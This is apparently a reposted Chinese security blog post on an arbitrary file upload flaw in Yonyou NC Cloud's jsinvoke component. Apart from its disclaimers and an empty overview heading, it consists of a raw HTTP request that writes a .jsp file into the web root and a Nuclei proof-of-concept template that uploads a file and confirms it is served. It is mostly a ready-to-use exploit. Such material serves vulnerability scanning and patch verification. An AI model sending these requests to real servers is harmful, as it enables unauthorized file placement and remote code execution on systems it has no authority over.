免责声明
此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时联系我们。谢谢!
漏洞概述
漏洞复现
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
"parameterTypes":["java.lang.Object","java.lang.String"],
"parameters":["123456","webapps/nc_web/2YIOmzdcUDhwMYTLk65p3cgxvxy.jsp"]}
NUCLEI POC
id: yonyou-nc-cloud-jsinvoke-upload
info:
name: 用友 NC Cloud jsinvoke 任意文件上传
author: rain
severity: critical
description: 用友 NC Cloud 中存在 jsinvoke 组件的任意文件上传漏洞,攻击者可以通过利用此漏洞向系统上传任意恶意文件。漏洞的根本问题在于未正确验证用户提交的文件,导致恶意攻击者可以绕过限制,向服务器上传包含恶意代码的文件。
metadata:
max-request: 2
tags: yonyou,rce
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}"
file_content: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
"parameterTypes":["java.lang.Object","java.lang.String"],
"parameters":["{{file_content}}","webapps/nc_web/{{file_name}}.jsp"]}
- |
GET /{{file_name}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
- type: dsl
dsl:
- status_code_1 == 200
- status_code_2 == 200 && contains(body_2,"{{file_content}}")
原文始发于微信公众号(知黑守白):「漏洞复现」用友 NC Cloud jsinvoke 任意文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论